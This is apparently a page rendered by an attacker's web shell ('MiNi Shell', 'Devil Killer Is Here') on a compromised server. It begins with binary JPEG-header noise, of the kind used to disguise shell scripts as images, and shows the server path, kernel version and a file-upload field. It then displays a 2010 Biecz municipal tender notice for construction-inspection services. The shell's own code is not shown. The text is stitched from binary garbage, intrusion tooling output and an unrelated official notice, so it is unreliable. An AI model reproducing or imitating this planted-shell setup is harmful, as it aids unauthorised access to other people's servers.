JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100616/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100616/170860-N-2010.html

<p class="kh_header"><b>Biecz: Pełnienie obowiązków inspektora nad zadaniem pn. Rewitalizacja układu staromiejskiego miasta Biecz dla rozwoju produktu turystycznego - część I w ramach Małopolskiego Regionalnego Programu Operacyjnego  na lata 2007-2013</b><br>
<b>Numer ogłoszenia: 170860 - 2010; data zamieszczenia: 16.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Biecz , Rynek 1, 38-340 Biecz, woj. małopolskie, tel. 013 4471113, faks 013 4471113.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.biecz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie obowiązków inspektora nad zadaniem pn. Rewitalizacja układu staromiejskiego miasta Biecz dla rozwoju produktu turystycznego - część I w ramach Małopolskiego Regionalnego Programu Operacyjnego  na lata 2007-2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie obowiązków inspektora nad zadaniem pn. Rewitalizacja układu staromiejskiego miasta Biecz dla rozwoju produktu turystycznego - część I w ramach Małopolskiego Regionalnego Programu Operacyjnego  na lata 2007-2013

Usługa obejmuje pełny zakres czynności jakie dla inspektora przewiduje ustawa z dnia 07.07.1994 r. Prawo budowlane (Dz. U. z 2006 r. Nr 156, poz. 1118 z późn. zm.) i będzie realizowana w następujących branżach:
- konstrukcyjno - budowlanej,
- drogowej,
- instalacyjnej w zakresie sieci,  instalacji i urządzeń elektrycznych                                         i  elektroenergetycznych,
- instalacyjnej w zakresie sieci, instalacji i urządzeń gazowych, wodociągowych                                          i kanalizacyjnych.
W ramach projektu przewiduje się realizację następujących zamierzeń:
a). Przystosowanie byłego placu targowego przy ul. Tumidajskiego na parking:
-wykonanie nawierzchni z kostki brukowej z podziałem na miejsca postojowe, 
-budowa budynku sanitariatu. 
b). Poprawa wizerunku płyty Rynku:
-wymiana nawierzchni płyty Rynku wraz  elementami małej architektury oraz iluminacja świetlna budynku Ratusza,
-wykonanie pasa akustycznego składającego się z istniejących i projektowanych drzew.
c). Przebudowa uliczek wokół Rynku i uliczek przyległych (Potockiego, Kromera, Barianów-Rokickich,  Januszewicza, Krzemińskiego, Piekarska):
-przebudowa nawierzchni jezdni i chodników (kostka granitowa lub brukowa),
-ul. Krzemińskiego - przebudowa schodów.
    d). Przebudowa ulicy Ligęzów wraz z wykonaniem miejsc parkingowych:
-remont nawierzchni asfaltowej,
-wykonanie chodnika dla pieszych,
-wykonanie nawierzchni z kostki brukowej z podziałem na miejsca postojowe.
    e). Przebudowa warstwy nawierzchniowej na ul. Węgierskiej i Grodzkiej.
    f).  Wykonanie miejsc parkingowych przy ul. Bochniewicza.
    g). Przebudowa ul. Potockiego, W. Pola i Ariańskiej:
-przebudowa nawierzchni jezdni i chodników (kostka granitowa lub brukowa).
    h). Przystosowanie budynku Rynek 18 na cele kulturalne.
  i). Remont elewacji i dachu domu Becza.
    j). Remont elewacji Domu z basztą.
    k). Remont elewacji oraz dachu budynku przy ul. Rynek 9.
    l) . Wykonanie remontu elewacji budynku Marcina Kromera (muzeum).
    m).Przystosowanie wieży ratuszowej dla turystów:
-dostosowanie istniejących schodów prowadzących na wieżę do wymagań przepisów przeciwpożarowych i bhp.
   n).  Remont kina FARYS:
-remont elewacji kina,
-modernizacja kotłowni i instalacji grzewczej,
-wykonanie ekranu plenerowego na elewacji północnej budynku (kino letnie).
  o). Przebudowa istniejącego sanitariatu publicznego - dostosowanie do obecnych standardów.
  p). Organizacja Centrum Informacji Turystycznej:
-połączenie piwnic schodami z parterem budynku.
  r). Zagospodarowanie brzegów rzeki Ropy:
-wykonanie alejek spacerowych,
-wykonanie oświetlenia,
-wykonanie małej architektury - ławki.
 s). Zagospodarowanie placu na cele wypoczynkowe:
-wykonanie alejek spacerowych,
-wykonanie oświetlenia,
-wykonanie małej architektury - ławki,-wykonanie aranżacji  zieleni.
 t). Wykonanie alejek spacerowych przy murze obronnym od strony zachodniej i północnej (przy dzwonnicy, baszcie kowalskiej).
 u). Zagospodarowanie parku miejskiego:
-wykonanie alejek spacerowych,
-remont oświetlenia, 
-wykonanie małej architektury - ławki, altany,
-wykonanie miejsca do zabawy dla dzieci (piaskownica, zjeżdżalnia),
-wykonanie aranżacji  zieleni.
w).  Wykonanie iluminacji świetlnej starówki - wymiana istniejącego oświetlenia.
 z).  Przebudowa sieci wodociągowej, sieci kanalizacji sanitarnej i sieci kanalizacji opadowej w ulicach:  B. Rokickich , Kromera, Piekarskie, Ariańskiej i Potockiego.
Koszt wyżej wymienionych zadań  ok.  10 500 000,00 PLN.
4.	Zakres czynności inspektora nadzoru:
  -    wykonywanie powierzonych czynności sumiennie i fachowo, czuwanie w imieniu  zamawiającego nad prawidłową realizacją umów zawartych z wykonawcami oraz chronienie interesów zamawiającego we wszystkich przejawach nadzoru, kontrolowanie wykonawców w zakresie zabezpieczenia warunków bhp na placu budowy i w otoczeniu,

-  reprezentowanie inwestora na budowie przez sprawowanie kontroli zgodności jej realizacji                   z dokumentacją techniczną, specyfikacją techniczną, pozwoleniem na budowę, przepisami                           i obowiązującymi Polskimi Normami oraz zasadami wiedzy technicznej,

      -  zaznajomienie się z dokumentacją projektową, umowami o wykonanie robót, warunkami pozwolenia  na budowę, terenem, jego uzbrojeniem  i urządzeniami - przed wejściem wykonawców na plac budowy,

-    dokonywanie poprawek w dokumentacji nie powodujących zwiększenia kosztów nadzorowanych robót, oraz nie mających wpływu na rozwiązania urbanistyczno - architektoniczne, rozwiązania konstrukcyjne, technologiczne i instalacyjne, jak również nie powodujących pogorszenia użyteczności obiektu - w uzgodnieniu z autorami projektów i wykonawcami - poprzez odpowiedni zapis w dzienniku budowy i naniesienie tych poprawek w dokumentacji,

-  zgłaszanie zamawiającemu wad i niedokładności w dokumentacji lub też konieczności wprowadzenia zmian w celu zastosowania innych rozwiązań technicznych, względnie innych materiałów nieprzewidzianych w dokumentacji lub w celu osiągnięcia oszczędności i obniżenia kosztów budowy, 

  -  na żądanie zamawiającego sprawdzenia projektów i przedmiarów robót posiadanych przez   zamawiającego na realizację nadzorowanych inwestycji oraz do złożenia uwag na piśmie                                   w terminie do 7 dni od przekazania dokumentacji,

- oceny oferty wybranej przez zamawiającego w zakresie jej treści, przyjętych materiałów, rozwiązań technologicznych, parametrów pod kątem zabezpieczenia wykonania robót zgodnie                  z projektem, SIWZ, wymogami zamawiającego oraz sztuką budowlaną (ocena będzie dokonana poprzez złożenie stosownego oświadczenia).

          -  opiniowania proponowanych rozwiązań zamiennych,

      - zabezpieczenie i niezwłocznie zawiadomienie konserwatora zabytków w wypadku odkrycia niezainwentaryzowanych obiektów zabytkowych,

    - sprawdzenie posiadania przez kierowników budowy odpowiednich dokumentów (atestów, świadectw jakości, wyników badań) dotyczących elementów prefabrykowanych i innych wyrobów przed ich wbudowaniem. W razie braku wymaganych dokumentów stwierdzających właściwą jakość lub też w razie zastrzeżeń dotyczący elementów prefabrykowanych lub innych wyrobów przewidzianych do wbudowania - żądanie od wykonawcy odpowiednich badań i przedstawienia ekspertyzy technicznej,

   - w razie stwierdzenia niezgodności wykonywania robót z dokumentacją projektową, nieprawidłowości procesów technologicznych, użycia niewłaściwych materiałów, wad                       w wykonaniu lub przeprowadzeniu robót w sposób powodujący podwyżkę kosztów budowy, bądź mogących narazić inwestora na straty - zwracanie na to uwagi kierownikowi budowy                        i podejmowanie odpowiednich decyzji, dokonywanie wpisów do dziennika budowy, wyznaczając termin ich wykonania i zawiadamiając o nim na piśmie inwestora, wykonawców i autorów projektów,
   
     - sprawowanie nadzoru na budowie w odstępach czasu zapewniających właściwą i skuteczną kontrolę  nadzorowanych robót, jednak nie rzadziej niż dwa razy w tygodniu, każdy pobyt na budowie w  czasie prowadzonych robót ma być potwierdzony wpisem ustaleń do dziennika budowy. Dodatkowo inspektor zobowiązany jest do przybycia na budowę na wezwanie zamawiającego  w razie zaistniałej potrzeby w czasie 4 godz. od telefonicznego powiadomienia (godziny rozliczane będą w ramach standardowego czasu pracy 7:00-15:00),

     -    sprawdzanie robót ulegających zakryciu lub zanikających, najpóźniej w ciągu 3 dni roboczych po zgłoszeniu ich przez kierownika budowy zapisem w dzienniku budowy. W przypadku niezgłoszenia tych robót do sprawdzenia inspektor nadzoru może  żądać dokonania przez wykonawcę, na jego koszt odkrywek elementów robót budzących wątpliwości,

    - sprawdzenie wykonania przez służbę geodezyjną powykonawczych pomiarów inwentaryzacyjnych, a także sprawdzenie zgodności usytuowania obiektów z dokumentacją techniczną. Stwierdzenie wykonania tych czynności zapisem w dzienniku budowy,

    -  uczestniczenie w przeprowadzonych prze wykonawcę próbach i odbiorach technicznych instalacji i urządzeń,

     -   dopilnowanie przestrzegania przez wykonawcę zasad BH i ustaleń planu BIOZ,

- zawiadamianie nadzoru budowlanego o wypadkach naruszenia prawa budowlanego stwierdzonych w toku realizacji budowy, dotyczących bezpieczeństwa budowy i ochrony środowiska, a także o rażących nieprawidłowościach lub uchybieniach technicznych,

      -  zapewnienie we własnym zakresie transportu w celu dotarcia na budowę,
      
     -  sprawdzenie pod względem merytorycznym i formalnym oraz rachunkowym protokołów odbioru w zakresie wykonanych robót oraz zgodności faktur z umowami,
 
      -  kontrola ilości i wartości wykonywanych robót przed każdym odbiorem częściowym zadania,

      -  kontrola prawidłowości zafakturowania wykonanych robót,

      -  terminowe przekazywanie faktur do realizacji zamawiającemu,

      -   sprawdzania i potwierdzania prawidłowości dokumentów rozliczeniowych oraz dokumentacji    powykonawczych,

      -   uczestniczenie w czynnościach odbioru obiektu lub robót i przekazywanie ich do użytku,

      -  udział w komisjach powołanych do stwierdzenia ujawnionych wad,

    -   kontrolowanie usunięcia przez wykonawcę tych wad oraz bieżące informowanie zamawiającego o nieprawidłowościach, 
  
    -   udział w pracach komisji dotyczących przeglądów miedzy gwarancyjnych i pogwarancyjnych.

    
5.	Inne postanowienia dotyczące usługi stanowiącej przedmiot zamówienia:
-   opis zadań przewidzianych do nadzorowania przedstawiony został w rozdziale II pkt. 3 niniejszej SIWZ,
   - inspektorowi nadzoru nie wolno wykorzystywać we własnym interesie rzeczy i praw zamawiającego,
   - jeżeli w okresie realizacji robót zajdzie konieczność wykonania robót dodatkowych nieprzewidzianych umową zawartą z wykonawcą, to inspektor nadzoru powinien niezwłocznie zawiadomić o tym  zamawiającego, który podejmuje decyzje co do zlecenia tych robót wykonawcy,
   - inspektorowi nadzoru nie wolno wydawać wykonawcy poleceń wykonywania jakichkolwiek robót dodatkowych nie objętych umową o roboty budowlane,
    - zamawiający zobowiązuje się współdziałać z inspektorem nadzoru celem umożliwienia mu należytego wywiązania się z powierzonych czynności, a w szczególności udzielać mu informacji                         i wyjaśnień oraz udostępniać potrzebne dokumenty,
    - zamawiający przekaże inspektorowi nadzoru projekty budowlane oraz całą dokumentację budowy na podstawie protokołu przekazania potwierdzonego przez obie strony. 

6.	Rolę koordynatora  w stosunku do inspektorów poszczególnych specjalności pełnił będzie wskazany przez wykonawcę inspektor nadzoru inwestorskiego  w specjalności konstrukcyjno - budowlanej lub drogowej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia warunku należy wykazać co najmniej jedną wykonaną należycie usługę  polegającą na przeprowadzeniu nadzoru inwestorskiego nad inwestycjami: roboty ogólnobudowlane odpowiadające charakterowi zadań opisanych w rozdziale II pkt.3  SIWZ o wartości robót brutto co najmniej    1 500 000 PLN  oraz remonty dróg gminnych na terenie miasta o wartości robót brutto co najmniej 2 000 000 PLN. Wykonawca dołączy do ofert wykaz wykonanych usług w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, podaniem ich wartości, przedmiotu, dat wykonania i odbiorców  wraz z załączeniem dokumentu potwierdzającego, że usługi te zostały wykonane należycie,  przy czym ww. usługi (nadzór nad robotami ogólnobudowlanymi  i  nadzór nad remontami dróg gminnych na terenie miasta) mogą być wykonane jako odrębne zadania, w różnym czasie, w różnych miejscach i przez różne osoby</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia warunku należy wykazać dysponowanie przy realizacji zamówienia osobami posiadającymi odpowiednie uprawnienia do pełnienia funkcji inspektora nadzoru, będącymi członkami właściwych Izb Inżynierów Budownictwa i uprawnionymi  do nadzorowania robót  budowlanych przy zabytkach nieruchomych zgodnie z przepisami rozporządzenia Ministra Kultury z dnia 9 czerwca 2004 r. (Dz. U. z 2004 r. Nr 150 poz. 1579) w specjalnościach:
a)  konstrukcyjno - budowlanej  
b)  drogowej,
c)   instalacyjnej w zakresie sieci,  instalacji i urządzeń elektrycznych  i  elektroenergetycznych,
d)   instalacyjnej w zakresie sieci  instalacji i urządzeń gazowych, wodociągowych  i  kanalizacyjnych.

Wykonawca dołączy do oferty wykaz osób, które będą uczestniczyć w wykonaniu zamówienia,                      w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia,               a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami, a także oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Oferta na formularzu ofertowym o treści zgodnej z określoną we wzorze stanowiącym zał. nr 1 do SIWZ
2. Potwierdzony przez upoważnionego przedstawiciela wykonawcy wzór umowy stanowiacy zał. nr 7 do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany postanowień umowy oraz określenie warunków tych zmian zawiera wzór umowy stanowiący zał. nr 7 do SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.biecz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Bieczu  38-340 Biecz ul. Rynek 20, pok. nr 3.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.06.2010 godzina 09:30, miejsce: Urząd Miejski w Bieczu  38-340 Biecz ul. Rynek 1, pok. nr 2.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Małopolskiego Regionalnego Programu Operacyjnego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com